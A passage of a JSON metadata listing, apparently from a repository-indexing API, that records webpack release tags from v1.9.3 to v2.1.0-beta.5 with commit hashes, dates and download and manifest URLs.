":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositori